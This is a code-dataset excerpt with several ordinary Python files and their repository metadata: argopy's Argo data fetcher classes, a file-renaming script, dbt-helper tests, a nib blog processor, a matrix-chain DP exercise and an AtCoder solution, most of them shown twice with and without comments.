            raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
        return self.to_xarray(**kwargs).to_dataframe()
    def clear_cache(self):
        """ Clear fetcher cached data """
        return self.fetcher.clear_cache()
class ArgoIndexFetcher(object):
    """ Fetch and process Argo index (profile metadata).

    Specs discussion :
    https://github.com/euroargodev/argopy/issues/8
    https://github.com/euroargodev/argopy/pull/6)

    Usage:
    from argopy import ArgoIndexFetcher
    idx = ArgoIndexFetcher.region([-75, -65, 10, 20])
    idx.plot.trajectories()
    idx.to_dataframe()

    Can return metadata from index of :
    - one or more float(s), defined by WMOs
    - one or more profile(s), defined for one WMO and one or more CYCLE NUMBER
    - a space/time rectangular domain, defined by lat/lon/pres/time range

    idx object can also be used as an input :
    argo_loader = ArgoDataFetcher(index=idx)

    Specify here all options to data_fetchers
    """
    def __init__(self,
                 mode: str = "",
                 src: str = "",
                 **fetcher_kwargs):
        # Facade options; global OPTIONS are the fallback for empty values:
        self._mode = OPTIONS['mode'] if mode == '' else mode
        self._src = OPTIONS['src'] if src == '' else src
        _VALIDATORS['mode'](self._mode)
        _VALIDATORS['src'](self._src)
        # Load data source access points:
        if self._src not in AVAILABLE_INDEX_SOURCES:
            raise InvalidFetcher("Requested index fetcher '%s' not available ! "
                                 "Please try again with any of: %s" % (self._src, "\n".join(AVAILABLE_INDEX_SOURCES)))
        else:
            Fetchers = AVAILABLE_INDEX_SOURCES[self._src]
        # Auto-discovery of access points for this fetcher:
        # rq: Access point names for the facade are not the same as the access point of fetchers
        self.valid_access_points = ['profile', 'float', 'region']
        self.Fetchers = {}
        for p in Fetchers.access_points:
            if p == 'wmo':  # Required for 'profile' and 'float'
                self.Fetchers['profile'] = Fetchers.Fetcher_wmo
                self.Fetchers['float'] = Fetchers.Fetcher_wmo
            if p == 'box':  # Required for 'region'
                self.Fetchers['region'] = Fetchers.Fetcher_box
        # Init sub-methods:
        self.fetcher = None
        self.fetcher_options = {**fetcher_kwargs}
        self.postproccessor = self.__empty_processor
        self._AccessPoint = None
    def __repr__(self):
        if self.fetcher:
            summary = [self.fetcher.__repr__()]
            summary.append("User mode: %s" % self._mode)
        else:
            summary = ["<indexfetcher 'Not initialised'>"]
            summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
            summary.append("User mode: %s" % self._mode)
        return "\n".join(summary)
    def __empty_processor(self, xds):
        """ Do nothing to a dataset """
        return xds
    def __getattr__(self, key):
        """ Validate access points """
        # Only reached for attributes not found through normal lookup.
        valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
        if key not in self.valid_access_points and key not in valid_attrs:
            raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
        pass
    def profile(self, wmo, cyc):
        """ Fetch index for a profile
            given one or more WMOs and CYCLE_NUMBER
        """
        if 'profile' in self.Fetchers:
            self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
            self._AccessPoint = 'profile'  # Register the requested access point
        else:
            raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
        return self
    def float(self, wmo):
        """ Load index for one or more WMOs """
        if 'float' in self.Fetchers:
            self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
            self._AccessPoint = 'float'  # Register the requested access point
        else:
            raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
        return self
    def region(self, box):
        """ Load index for a rectangular space/time domain region """
        if 'region' in self.Fetchers:
            self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
            self._AccessPoint = 'region'  # Register the requested access point
        else:
            raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
        return self
    def to_dataframe(self, **kwargs):
        """ Fetch index and return pandas.Dataframe """
        if not self.fetcher:
            raise InvalidFetcher(" Initialize an access point (%s) first." %
                                 ",".join(self.Fetchers.keys()))
        return self.fetcher.to_dataframe(**kwargs)
    def to_xarray(self, **kwargs):
        """ Fetch index and return xr.dataset """
        if self._AccessPoint not in self.valid_access_points:
            raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
        return self.fetcher.to_xarray(**kwargs)
    def to_csv(self, file: str = 'output_file.csv'):
        """ Fetch index and write it to a csv file """
        if self._AccessPoint not in self.valid_access_points:
            raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
        return self.to_dataframe().to_csv(file)
    def plot(self, ptype='trajectory'):
        """ Create custom plots from index

        Parameters
        ----------
        ptype: str
            Type of plot to generate. This can be: 'trajectory', 'profiler', 'dac'.

        Returns
        -------
        fig : :class:`matplotlib.pyplot.figure.Figure`
            Figure instance
        """
        idx = self.to_dataframe()
        if ptype == 'dac':
            return plot_dac(idx)
        elif ptype == 'profiler':
            return plot_profilerType(idx)
        elif ptype == 'trajectory':
            # Sorted by file path so profiles are drawn in cycle order.
            return plot_trajectory(idx.sort_values(['file']))
        else:
            raise ValueError("Type of plot unavailable. Use: 'dac', 'profiler' or 'trajectory' (default)")
    def clear_cache(self):
        """ Clear fetcher cached data """
        return self.fetcher.clear_cache()
| 39.075949 | 121 | 0.593456 |
import warnings
from argopy.options import OPTIONS, _VALIDATORS
from .errors import InvalidFetcherAccessPoint, InvalidFetcher
from .utilities import list_available_data_src, list_available_index_src
from .plotters import plot_trajectory, plot_dac, plot_profilerType
AVAILABLE_DATA_SOURCES = list_available_data_src()
AVAILABLE_INDEX_SOURCES = list_available_index_src()
class ArgoDataFetcher(object):
def __init__(self,
mode: str = "",
src: str = "",
ds: str = "",
**fetcher_kwargs):
self._mode = OPTIONS['mode'] if mode == '' else mode
self._dataset_id = OPTIONS['dataset'] if ds == '' else ds
self._src = OPTIONS['src'] if src == '' else src
_VALIDATORS['mode'](self._mode)
_VALIDATORS['src'](self._src)
_VALIDATORS['dataset'](self._dataset_id)
if self._src not in AVAILABLE_DATA_SOURCES:
raise InvalidFetcher("Requested data fetcher '%s' not available ! Please try again with any of: %s"
% (self._src, "\n".join(AVAILABLE_DATA_SOURCES)))
else:
Fetchers = AVAILABLE_DATA_SOURCES[self._src]
self.valid_access_points = ['profile', 'float', 'region']
self.Fetchers = {}
for p in Fetchers.access_points:
if p == 'wmo':
self.Fetchers['profile'] = Fetchers.Fetch_wmo
self.Fetchers['float'] = Fetchers.Fetch_wmo
if p == 'box':
self.Fetchers['region'] = Fetchers.Fetch_box
self.fetcher = None
if ds is None:
ds = Fetchers.dataset_ids[0]
self.fetcher_options = {**{'ds': ds}, **fetcher_kwargs}
self.postproccessor = self.__empty_processor
self._AccessPoint = None
if self._dataset_id == 'bgc' and self._mode == 'standard':
warnings.warn(" 'BGC' dataset fetching in 'standard' user mode is not reliable. "
"Try to switch to 'expert' mode if you encounter errors.")
def __repr__(self):
if self.fetcher:
summary = [self.fetcher.__repr__()]
summary.append("Backend: %s" % self._src)
summary.append("User mode: %s" % self._mode)
else:
summary = ["<datafetcher 'Not initialised'>"]
summary.append("Backend: %s" % self._src)
summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
summary.append("User mode: %s" % self._mode)
return "\n".join(summary)
def __empty_processor(self, xds):
return xds
def __getattr__(self, key):
valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
if key not in self.valid_access_points and key not in valid_attrs:
raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
pass
def dashboard(self, **kw):
try:
return self.fetcher.dashboard(**kw)
except Exception as e:
warnings.warn("dashboard not avaible for this fetcher access point (%s/%s)" % (self._src, self._AccessPoint))
def float(self, wmo, **kw):
if "CYC" in kw or "cyc" in kw:
raise TypeError("float() got an unexpected keyword argument 'cyc'. Use 'profile' access "
"point to fetch specific profile data.")
if 'float' in self.Fetchers:
self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
self._AccessPoint = 'float'
else:
raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def profile(self, wmo, cyc):
if 'profile' in self.Fetchers:
self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
self._AccessPoint = 'profile'
else:
raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def region(self, box: list):
if 'region' in self.Fetchers:
self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
self._AccessPoint = 'region'
else:
raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def to_xarray(self, **kwargs):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
xds = self.fetcher.to_xarray(**kwargs)
xds = self.postproccessor(xds)
return xds
def to_dataframe(self, **kwargs):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.to_xarray(**kwargs).to_dataframe()
def clear_cache(self):
return self.fetcher.clear_cache()
class ArgoIndexFetcher(object):
def __init__(self,
mode: str = "",
src: str = "",
**fetcher_kwargs):
self._mode = OPTIONS['mode'] if mode == '' else mode
self._src = OPTIONS['src'] if src == '' else src
_VALIDATORS['mode'](self._mode)
_VALIDATORS['src'](self._src)
if self._src not in AVAILABLE_INDEX_SOURCES:
raise InvalidFetcher("Requested index fetcher '%s' not available ! "
"Please try again with any of: %s" % (self._src, "\n".join(AVAILABLE_INDEX_SOURCES)))
else:
Fetchers = AVAILABLE_INDEX_SOURCES[self._src]
self.valid_access_points = ['profile', 'float', 'region']
self.Fetchers = {}
for p in Fetchers.access_points:
if p == 'wmo':
self.Fetchers['profile'] = Fetchers.Fetcher_wmo
self.Fetchers['float'] = Fetchers.Fetcher_wmo
if p == 'box':
self.Fetchers['region'] = Fetchers.Fetcher_box
self.fetcher = None
self.fetcher_options = {**fetcher_kwargs}
self.postproccessor = self.__empty_processor
self._AccessPoint = None
def __repr__(self):
if self.fetcher:
summary = [self.fetcher.__repr__()]
summary.append("User mode: %s" % self._mode)
else:
summary = ["<indexfetcher 'Not initialised'>"]
summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
summary.append("User mode: %s" % self._mode)
return "\n".join(summary)
def __empty_processor(self, xds):
return xds
def __getattr__(self, key):
valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
if key not in self.valid_access_points and key not in valid_attrs:
raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
pass
def profile(self, wmo, cyc):
if 'profile' in self.Fetchers:
self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
self._AccessPoint = 'profile'
else:
raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
return self
def float(self, wmo):
if 'float' in self.Fetchers:
self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
self._AccessPoint = 'float'
else:
raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
return self
def region(self, box):
if 'region' in self.Fetchers:
self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
self._AccessPoint = 'region'
else:
raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
return self
def to_dataframe(self, **kwargs):
if not self.fetcher:
raise InvalidFetcher(" Initialize an access point (%s) first." %
",".join(self.Fetchers.keys()))
return self.fetcher.to_dataframe(**kwargs)
def to_xarray(self, **kwargs):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.fetcher.to_xarray(**kwargs)
def to_csv(self, file: str = 'output_file.csv'):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.to_dataframe().to_csv(file)
def plot(self, ptype='trajectory'):
idx = self.to_dataframe()
if ptype == 'dac':
return plot_dac(idx)
elif ptype == 'profiler':
return plot_profilerType(idx)
elif ptype == 'trajectory':
return plot_trajectory(idx.sort_values(['file']))
else:
raise ValueError("Type of plot unavailable. Use: 'dac', 'profiler' or 'trajectory' (default)")
def clear_cache(self):
return self.fetcher.clear_cache()
| true | true |
f725fc00d7ebb2835c0b2bf25f77e74b2071941c | 1,732 | py | Python | renameFiles.py | fkorsa/PythonScripts | 3ceb990a4e25eb2ac33c9841f5345de77a456904 | [
"BSD-3-Clause"
] | null | null | null | renameFiles.py | fkorsa/PythonScripts | 3ceb990a4e25eb2ac33c9841f5345de77a456904 | [
"BSD-3-Clause"
] | null | null | null | renameFiles.py | fkorsa/PythonScripts | 3ceb990a4e25eb2ac33c9841f5345de77a456904 | [
"BSD-3-Clause"
] | null | null | null | # Import all dependencies
import re, os, sys
from shutil import copyfile
def GetNewName(oldName, parameters):
    """Return *oldName* with its numeric counter decremented by one and
    zero-padded to five digits.

    A name is expected to look like ``<prefix><digits><suffix>`` where the
    prefix contains only letters, underscores and dots (e.g. ``img00002.png``
    becomes ``img00001.png``).

    Parameters
    ----------
    oldName : str
        File name containing a numeric counter.
    parameters
        Unused; kept for interface compatibility with callers.

    Raises
    ------
    ValueError
        If ``oldName`` does not match the expected pattern (callers catch
        this to skip the file).
    """
    # BUG FIX: the original character class was ``[a-zA_Z_\.]`` — a typo for
    # ``[a-zA-Z_\.]`` — which silently failed on prefixes containing the
    # uppercase letters B..Y (e.g. "IMG00002.png" raised ValueError).
    pattern = r'([a-zA-Z_\.]+)([0-9]+)(.*)'
    match = re.fullmatch(pattern, oldName)
    if match is None:
        # Preserve the original contract: non-matching names raise ValueError.
        raise ValueError("filename %r has no recognizable numeric counter" % oldName)
    beginning, digits, ending = match.groups()
    pictureIndex = int(digits) - 1
    # zfill pads to 5 digits, matching the original manual '0' padding.
    return beginning + str(pictureIndex).zfill(5) + ending
def renameFiles(inputFolder, outputFolder, parameters):
    """Copy every file found under *inputFolder* into *outputFolder*, renamed
    via GetNewName; files that do not match its pattern are skipped."""
    if not os.path.exists(outputFolder):
        os.mkdir(outputFolder)
    # Browse all files and subfolders
    for dirname, dirnames, filenames in os.walk(inputFolder):
        # Browse all files in current subfolder
        # NOTE(review): files are processed in reverse name order —
        # presumably so higher-numbered frames are handled first; confirm.
        filenames.sort(reverse=True)
        for filename in filenames:
            try:
                newFilename = GetNewName(filename, parameters)
                inputFile = os.path.join(dirname, filename)
                # All outputs land flat in outputFolder (subfolders are not
                # recreated on the output side).
                outputFile = os.path.join(outputFolder, newFilename)
                print('renaming ' + inputFile + ' into ' + outputFile)
                copyfile(inputFile, outputFile)
            except ValueError:
                # GetNewName raises ValueError for non-matching names.
                print('Wrong filename. Skipping this file.')
if __name__ == "__main__":
    # Folders come from the CLI when given, otherwise prompt interactively.
    inputFolder = ''
    outputFolder = ''
    if len(sys.argv) < 3:
        inputFolder = input('>> Input folder : ')
        outputFolder = input('>> Output folder : ')
    else:
        inputFolder = sys.argv[1]
        outputFolder = sys.argv[2]
    renameFiles(inputFolder, outputFolder, ['', '', ''])
import re, os, sys
from shutil import copyfile
def GetNewName(oldName, parameters):
pattern = r'([a-zA_Z_\.]+)([0-9]+)(.*)'
beginning = re.sub(pattern, r'\1', oldName)
pictureIndex = int(re.sub(pattern, r'\2', oldName)) - 1
ending = re.sub(pattern, r'\3', oldName)
pictureIndexString = str(pictureIndex)
pictureIndexString = ('0' * (5 - len(pictureIndexString))) + pictureIndexString
return beginning + pictureIndexString + ending
def renameFiles(inputFolder, outputFolder, parameters):
if not os.path.exists(outputFolder):
os.mkdir(outputFolder)
for dirname, dirnames, filenames in os.walk(inputFolder):
filenames.sort(reverse=True)
for filename in filenames:
try:
newFilename = GetNewName(filename, parameters)
inputFile = os.path.join(dirname, filename)
outputFile = os.path.join(outputFolder, newFilename)
print('renaming ' + inputFile + ' into ' + outputFile)
copyfile(inputFile, outputFile)
except ValueError:
print('Wrong filename. Skipping this file.')
if __name__ == "__main__":
inputFolder = ''
outputFolder = ''
if len(sys.argv) < 3:
inputFolder = input('>> Input folder : ')
outputFolder = input('>> Output folder : ')
else:
inputFolder = sys.argv[1]
outputFolder = sys.argv[2]
renameFiles(inputFolder, outputFolder, ['', '', '']) | true | true |
f725fd65cd9fd0c6626d2ccb18a6ab12c3269b2d | 734 | py | Python | test/integration/006_source_schema_test/test_source_schemas.py | bastienboutonnet/dbt-helper | 7bf56384ae584542eb22adf5431df1854e95ae9b | [
"Apache-2.0"
] | null | null | null | test/integration/006_source_schema_test/test_source_schemas.py | bastienboutonnet/dbt-helper | 7bf56384ae584542eb22adf5431df1854e95ae9b | [
"Apache-2.0"
] | null | null | null | test/integration/006_source_schema_test/test_source_schemas.py | bastienboutonnet/dbt-helper | 7bf56384ae584542eb22adf5431df1854e95ae9b | [
"Apache-2.0"
] | null | null | null | from test.integration.base import DBTIntegrationTest
class SourceSchemaTest(DBTIntegrationTest):
    def test_dependencies(self):
        """After a dbt run, upstream/downstream result counts match the DAG."""
        self.run_dbt(["run"])
        expectations = [
            ("show_upstream", "d", 5),
            ("show_downstream", "d", 1),
            ("show_upstream", "c", 4),
            ("show_downstream", "c", 2),
        ]
        for command, model, expected_count in expectations:
            results = self.run_dbthelper([command, model])
            self.assertTrue(len(results) == expected_count)
    def test_compare(self):
        """A freshly-run project reports no differences from compare."""
        self.run_dbt(["run"])
        results = self.run_dbthelper(["compare"])
        self.assertTrue(len(results) == 0)
| 36.7 | 62 | 0.638965 | from test.integration.base import DBTIntegrationTest
class SourceSchemaTest(DBTIntegrationTest):
def test_dependencies(self):
self.run_dbt(["run"])
results = self.run_dbthelper(["show_upstream", "d"])
self.assertTrue(len(results) == 5)
results = self.run_dbthelper(["show_downstream", "d"])
self.assertTrue(len(results) == 1)
results = self.run_dbthelper(["show_upstream", "c"])
self.assertTrue(len(results) == 4)
results = self.run_dbthelper(["show_downstream", "c"])
self.assertTrue(len(results) == 2)
def test_compare(self):
self.run_dbt(["run"])
results = self.run_dbthelper(["compare"])
self.assertTrue(len(results) == 0)
| true | true |
f725fe7163265998e318929048c9c017ed7a3eaa | 203 | py | Python | scitbx/suffixtree/single.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | scitbx/suffixtree/single.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | scitbx/suffixtree/single.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | from __future__ import absolute_import, division, print_function
import boost_adaptbx.boost.python as bp
ext = bp.import_ext( "scitbx_suffixtree_single_ext" )
from scitbx_suffixtree_single_ext import *
| 33.833333 | 64 | 0.847291 | from __future__ import absolute_import, division, print_function
import boost_adaptbx.boost.python as bp
ext = bp.import_ext( "scitbx_suffixtree_single_ext" )
from scitbx_suffixtree_single_ext import *
| true | true |
f726009e115fa53dcbb215945e9db16a7b200188 | 1,222 | py | Python | DynamicProgramming/matrixChainMultiplication.py | ZPAVelocity/DataStructureExercise | 39b1cce859e5c46599b3a6e69ac80ade5920aa34 | [
"MIT"
] | null | null | null | DynamicProgramming/matrixChainMultiplication.py | ZPAVelocity/DataStructureExercise | 39b1cce859e5c46599b3a6e69ac80ade5920aa34 | [
"MIT"
] | null | null | null | DynamicProgramming/matrixChainMultiplication.py | ZPAVelocity/DataStructureExercise | 39b1cce859e5c46599b3a6e69ac80ade5920aa34 | [
"MIT"
] | null | null | null | import sys
import numpy as np
def main():
    """Demo: print the DP cost (m) and split (s) tables for the CLRS example chain."""
    dims = [30, 35, 15, 5, 10, 20, 25]
    costs, splits = matrixChainOrder(dims)
    for label, table in (('m', costs), ('s', splits)):
        print(label)
        for row in table:
            print(row)
def matrixMultiply(A, B):
    """Return the matrix product of 2-D numpy arrays A and B via explicit loops.

    If the inner dimensions disagree, prints a message and returns an empty
    array (original contract kept for callers).
    """
    if A.shape[1] != B.shape[0]:
        print('incompatible dimensions')
        return np.array([[]])
    # BUG FIX: the result must be A.shape[0] x B.shape[1].  The original
    # allocated a B.shape[1] x A.shape[0] table, which produced IndexError
    # (or a wrongly-shaped result) whenever those two sizes differed.
    C = np.zeros((A.shape[0], B.shape[1]), dtype=np.result_type(A, B))
    for i in range(A.shape[0]):
        for j in range(B.shape[1]):
            total = 0
            for k in range(A.shape[1]):
                total += A[i][k] * B[k][j]
            C[i][j] = total
    return C
def matrixChainOrder(p):
    """Matrix-chain order DP (CLRS 15.2).

    p holds the chain dimensions (matrix i is p[i] x p[i+1], 0-based).
    Returns (m, s): m[i][j] is the minimal scalar-multiplication cost of
    computing matrices i..j, and s[i][j] the stored split index (k + 1).
    """
    n = len(p) - 1  # number of matrices in the chain
    m = [[0] * n for _ in range(n)]
    s = [[0] * n for _ in range(n)]
    # Single matrices cost nothing (diagonal already zero); fill by
    # increasing chain length.
    for length in range(2, n + 1):
        for i in range(0, n - length + 1):
            j = i + length - 1
            best = sys.maxsize
            for k in range(i, j):
                cost = m[i][k] + m[k + 1][j] + p[i] * p[k + 1] * p[j + 1]
                if cost < best:
                    best = cost
                    s[i][j] = k + 1
            m[i][j] = best
    return m, s
if __name__ == "__main__":  # run the demo only when executed as a script
    main()
| 23.5 | 77 | 0.432079 | import sys
import numpy as np
def main():
p = [30, 35, 15, 5, 10, 20, 25]
m, s = matrixChainOrder(p)
print('m')
for i in m:
print(i)
print('s')
for i in s:
print(i)
def matrixMultiply(A, B):
if A.shape[1] != B.shape[0]:
print('incompatible dimensions')
return np.array([[]])
C = np.array([[0 for i in range(A.shape[0])] for i in range(B.shape[1])])
for i in range(A.shape[0]):
for j in range(B.shape[1]):
C[i][j] = 0
for k in range(A.shape[1]):
C[i][j] += + A[i][k] * B[k][j]
return C
def matrixChainOrder(p):
n = len(p) - 1
m = [[0 for i in range(n)] for j in range(n)]
s = [[0 for i in range(n)] for j in range(n)]
for i in range(0, n):
m[i][i] = 0
for l in range(2, n + 1):
for i in range(0, n - l + 1):
j = i + l - 1
m[i][j] = sys.maxsize
for k in range(i, j):
q = m[i][k] + m[k + 1][j] + p[i] * p[k + 1] * p[j + 1]
if q < m[i][j]:
m[i][j] = q
s[i][j] = k + 1
return m, s
if __name__ == "__main__":
main()
| true | true |
f72600ddc98d2dae8f2a00689368dc6c971a3fb8 | 3,248 | py | Python | nib/plugins/blog.py | jreese/nib | 53308e73aae7d10cdc273ab339bb041b07930a75 | [
"MIT"
] | 10 | 2015-02-03T08:21:16.000Z | 2021-12-24T10:08:57.000Z | nib/plugins/blog.py | jreese/nib | 53308e73aae7d10cdc273ab339bb041b07930a75 | [
"MIT"
] | 4 | 2016-09-22T01:18:30.000Z | 2016-09-23T00:18:38.000Z | nib/plugins/blog.py | jreese/nib | 53308e73aae7d10cdc273ab339bb041b07930a75 | [
"MIT"
] | 2 | 2016-09-22T00:39:31.000Z | 2017-03-16T00:09:47.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import re
from nib import Document, Processor, before, document
# YYYY-MM-DD with '-', '.' or '/' separators; appears unused in this module.
dateregex = re.compile(r'(?P<year>\d\d\d\d)[-./](?P<month>\d\d)[-./](?P<day>\d\d)')
@before
class BlogDateProcessor(Processor):
    """Pre-pass: any dated document without a group is assigned to 'blog'."""

    def document(self, document):
        has_date = 'date' in document
        if has_date and document.group is None:
            document.group = 'blog'
        return document
@document('blog')
class BlogDocumentProcessor(Processor):
    """Build the blog's feed/index/archive/tag listing pages from dated documents.

    Every document in the 'blog' group gets the post template and is linked
    into the generated listing pages, which are then appended to *documents*.
    """

    def process(self, documents, resources):
        # Site configuration: which archive levels to build, URI patterns for
        # generated pages, and the template used for each page kind.
        archives = self.options['blog']['archive']
        uris = self.options['blog']['uris']
        templates = self.options['blog']['templates']

        # Cache of generated listing pages keyed by rendered URI path, so
        # e.g. all posts of one month share a single monthly page.
        blog_pages = {}

        def blog_page(name, parent=None, child=None, **kwargs):
            # Get-or-create the listing page for URI pattern *name* rendered
            # with **kwargs; optionally link it under *parent* and append
            # *child* to its page list.
            path = uris[name].format(**kwargs)
            if path not in blog_pages:
                page = Document(path=path,
                                content='',
                                short='',
                                template=templates[name],
                                pages=[],
                                **kwargs
                                )
                if parent:
                    parent['pages'].append(page)
                blog_pages[path] = page
            else:
                page = blog_pages[path]
            if child:
                page['pages'].append(child)
            return page

        # Top-level synthetic pages, created up front even when empty.
        feed_page = blog_page('feed', paginate=False)
        index_page = blog_page('index')
        archive_page = blog_page('archive', title='Archive', paginate=False)
        tags_page = blog_page('tags', title='Tags', paginate=False)

        for document in documents:
            document['template'] = templates['post']

            # Only file into date archives when 'date' is exactly a
            # datetime.date (a datetime.datetime fails this strict check).
            if type(document['date']) == datetime.date:
                date = document['date']
                kwargs = {
                    'date': date,
                    'year': date.year,
                    'month': date.month,
                    'day': date.day,
                }

                if archives['yearly']:
                    blog_page('yearly', parent=archive_page, child=document,
                              title=date.strftime('%Y'), type='year', **kwargs)

                if archives['monthly']:
                    blog_page('monthly', parent=archive_page, child=document,
                              title=date.strftime('%B %Y'), type='month', **kwargs)

                if archives['daily']:
                    blog_page('daily', parent=archive_page, child=document,
                              title=date.strftime('%B %d, %Y'), type='day', **kwargs)

            if 'tags' in document:
                # 'tags' arrives as a comma-separated string; it is replaced
                # by a mapping of tag name -> that tag's listing page.
                tags = [token.strip() for token in document['tags'].split(',')]
                document['tags'] = {}

                for tag in tags:
                    tag_page = blog_page('tag', parent=tags_page, child=document,
                                         title=tag, tag=tag)
                    document['tags'][tag] = tag_page

            feed_page['pages'].append(document)
            index_page['pages'].append(document)

        # Emit the generated listing pages alongside the original documents.
        documents.extend(blog_pages.values())
        return documents, resources
| 36.494382 | 85 | 0.494458 | from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import re
from nib import Document, Processor, before, document
dateregex = re.compile(r'(?P<year>\d\d\d\d)[-./](?P<month>\d\d)[-./](?P<day>\d\d)')
@before
class BlogDateProcessor(Processor):
def document(self, document):
if 'date' in document:
if document.group is None:
document.group = 'blog'
return document
@document('blog')
class BlogDocumentProcessor(Processor):
def process(self, documents, resources):
archives = self.options['blog']['archive']
uris = self.options['blog']['uris']
templates = self.options['blog']['templates']
blog_pages = {}
def blog_page(name, parent=None, child=None, **kwargs):
path = uris[name].format(**kwargs)
if path not in blog_pages:
page = Document(path=path,
content='',
short='',
template=templates[name],
pages=[],
**kwargs
)
if parent:
parent['pages'].append(page)
blog_pages[path] = page
else:
page = blog_pages[path]
if child:
page['pages'].append(child)
return page
feed_page = blog_page('feed', paginate=False)
index_page = blog_page('index')
archive_page = blog_page('archive', title='Archive', paginate=False)
tags_page = blog_page('tags', title='Tags', paginate=False)
for document in documents:
document['template'] = templates['post']
if type(document['date']) == datetime.date:
date = document['date']
kwargs = {
'date': date,
'year': date.year,
'month': date.month,
'day': date.day,
}
if archives['yearly']:
blog_page('yearly', parent=archive_page, child=document,
title=date.strftime('%Y'), type='year', **kwargs)
if archives['monthly']:
blog_page('monthly', parent=archive_page, child=document,
title=date.strftime('%B %Y'), type='month', **kwargs)
if archives['daily']:
blog_page('daily', parent=archive_page, child=document,
title=date.strftime('%B %d, %Y'), type='day', **kwargs)
if 'tags' in document:
tags = [token.strip() for token in document['tags'].split(',')]
document['tags'] = {}
for tag in tags:
tag_page = blog_page('tag', parent=tags_page, child=document,
title=tag, tag=tag)
document['tags'][tag] = tag_page
feed_page['pages'].append(document)
index_page['pages'].append(document)
documents.extend(blog_pages.values())
return documents, resources
| true | true |
f72601e5fda214f23f81969e4034744eaff7b404 | 188 | py | Python | atcoder/abc178C_ubiquity.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 31 | 2020-05-13T01:07:55.000Z | 2021-07-13T07:53:26.000Z | atcoder/abc178C_ubiquity.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 10 | 2020-05-20T07:22:09.000Z | 2021-07-19T03:52:13.000Z | atcoder/abc178C_ubiquity.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 14 | 2020-05-11T05:58:36.000Z | 2021-12-07T03:20:43.000Z | # Vicfred & uninhm
# https://atcoder.jp/contests/abc178/tasks/abc178_c
# combinatorics
# Inclusion-exclusion per the linked problem: of the 10^n digit strings of
# length n, subtract those avoiding one particular digit (9^n, counted twice)
# and add back those avoiding both (8^n).  All arithmetic mod 1e9+7.
n = int(input())
mod = 10**9+7
print((pow(10, n, mod) - 2*pow(9, n, mod) + pow(8, n, mod)) % mod)
| 18.8 | 66 | 0.62234 |
n = int(input())
